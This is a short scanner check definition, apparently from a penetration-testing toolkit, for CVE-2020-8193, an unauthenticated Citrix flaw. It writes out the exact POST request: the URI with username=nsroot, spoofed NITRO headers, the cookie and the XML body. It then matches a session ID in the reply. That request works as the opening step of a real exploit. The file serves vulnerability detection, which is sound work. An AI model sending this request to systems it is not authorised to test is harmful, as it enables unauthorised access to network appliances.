AUTHOR='@xer0dayz' VULN_NAME='CVE-2020-8193 - Citrix Unauthenticated LFI' URI="/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1" METHOD='POST' MATCH="SESSID" SEVERITY='P1 - CRITICAL' CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Content-Type: application/xml' -H 'X-NITRO-USER: xpyZxwy6' -H 'X-NITRO-PASS: xWXHUJ56' -I --data '<appfwprofile><login></login></appfwprofile>'" SECONDARY_COMMANDS='' GREP_OPTIONS='-i'